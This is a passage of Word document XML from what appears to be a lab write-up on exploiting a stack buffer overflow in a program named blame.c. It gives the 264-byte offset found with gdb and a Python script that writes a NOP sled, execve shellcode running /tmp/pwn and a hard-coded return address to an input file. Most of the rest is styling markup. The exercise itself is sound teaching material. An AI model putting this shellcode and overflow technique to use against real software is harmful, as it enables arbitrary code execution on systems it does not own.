        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –o payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –d payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRPr="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986"/>
    <w:p w:rsidR="00984632" w:rsidRDefault="00984632">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Input File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRDefault="00984632" w:rsidP="003D4986">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2235"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A python script is used to generate the input file. Testing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> showed that there were 264 bytes between the start of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>scapegoat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buffer and the return instruction pointer. The memory address to place into the return instruction pointer was discovered by adding a print statement to </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>blame.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that output the address of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>scapegoat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:t>payload =</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </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"\x90"</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>204</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </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"\x48\x31\xd2"</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"\x48\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>xbb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>\x2f\x74\x6d\x70\x2f"</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"\x70\x77\x6e"</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"\x53"</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"\x48\x89\xe7"</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"\x50"</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"\x57"</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"\x48\x89\xe6"</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"\xb0\x3b"</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"\x0f\x05"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </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"\x90"</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>34</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>print</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t xml:space="preserve">"Payload size (without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>): "</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>(payload))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t xml:space="preserve"> +=</w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00984632">
        <w:t>"\xf0\xe4\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>\x7f"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t xml:space="preserve"> open('in.txt', 'w') as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRPr="00984632" w:rsidRDefault="00984632" w:rsidP="00984632">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984632">
        <w:t>    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00984632">
        <w:t>outfile.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00984632">
        <w:t>payload)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00984632" w:rsidRPr="009846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82B" w:rsidRDefault="0058482B" w:rsidP="00077449">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0058482B" w:rsidRDefault="0058482B" w:rsidP="0007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449" w:rsidRDefault="00077449">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1D6575">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D6575">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:t>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82B" w:rsidRDefault="0058482B" w:rsidP="00077449">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0058482B" w:rsidRDefault="0058482B" w:rsidP="000774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C3680"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEB6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7420D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8D6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F09A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C840BABA"/>
    <w:lvl w:ilvl="0" w:tplc="1746561C">
      <w:start w:val="5"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="Times New Roman" w:hAnsi="Symbol"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94"/>
    <w:rsid w:val="000051AC"/>
    <w:rsid w:val="00006B38"/>
    <w:rsid w:val="000122B4"/>
    <w:rsid w:val="00077449"/>
    <w:rsid w:val="000923BB"/>
    <w:rsid w:val="000E43C4"/>
    <w:rsid w:val="001D6575"/>
    <w:rsid w:val="001E705B"/>
    <w:rsid w:val="0028534D"/>
    <w:rsid w:val="002F3592"/>
    <w:rsid w:val="003039B4"/>
    <w:rsid w:val="00356C4D"/>
    <w:rsid w:val="003D4986"/>
    <w:rsid w:val="003E1D58"/>
    <w:rsid w:val="004379B2"/>
    <w:rsid w:val="00517611"/>
    <w:rsid w:val="0052481A"/>
    <w:rsid w:val="00535194"/>
    <w:rsid w:val="005502C2"/>
    <w:rsid w:val="00573A88"/>
    <w:rsid w:val="0058482B"/>
    <w:rsid w:val="005F0841"/>
    <w:rsid w:val="005F57D4"/>
    <w:rsid w:val="0068680C"/>
    <w:rsid w:val="008725F6"/>
    <w:rsid w:val="00872F4B"/>
    <w:rsid w:val="008A250F"/>
    <w:rsid w:val="00984632"/>
    <w:rsid w:val="0099474D"/>
    <w:rsid w:val="00A04FC2"/>
    <w:rsid w:val="00A26B92"/>
    <w:rsid w:val="00A81F10"/>
    <w:rsid w:val="00B0493B"/>
    <w:rsid w:val="00B07594"/>
    <w:rsid w:val="00B1133A"/>
    <w:rsid w:val="00BA12C7"/>
    <w:rsid w:val="00BA26E0"/>
    <w:rsid w:val="00E57F75"/>
    <w:rsid w:val="00E70C89"/>
    <w:rsid w:val="00F51EE3"/>
    <w:rsid w:val="00F5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6324E-9B37-484F-9BA5-8191D203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80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8680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351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1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80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8680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3519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DefaultParagraphFont"/>
    <w:rsid w:val="003E1D58"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="804000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003E1D58"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc161">
    <w:name w:val="sc161"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003E1D58"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="8000FF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc11">
    <w:name w:val="sc11"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003E1D58"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc101">
    <w:name w:val="sc101"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003E1D58"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc41">
    <w:name w:val="sc41"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003E1D58"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="FF8000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc61">
    <w:name w:val="sc61"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003E1D58"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="808080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeBlock">
    <w:name w:val="CodeBlock"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeBlockChar"/>
    <w:qFormat/>
    <w:rsid w:val="0068680C"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="5" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="5" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="5" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="5" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeInline">
    <w:name w:val="CodeInline"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeInlineChar"/>
    <w:qFormat/>
    <w:rsid w:val="002F3592"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:noProof/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeBlockChar">
    <w:name w:val="CodeBlock Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeBlock"/>
    <w:rsid w:val="0068680C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00517611"/>
    <w:pPr>
      <w:spacing w:before="200"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeInlineChar">
    <w:name w:val="CodeInline Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeInline"/>
    <w:rsid w:val="002F3592"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00517611"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008A250F"/>
    <w:pP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8A250F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc12">
    <w:name w:val="sc12"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F54F2B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="008000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc51">
    <w:name w:val="sc51"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F54F2B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc31">
    <w:name w:val="sc31"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000E43C4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="008080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc21">
    <w:name w:val="sc21"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00872F4B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="008000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="000774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7449"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00077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49"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00077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49"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009846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05179">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
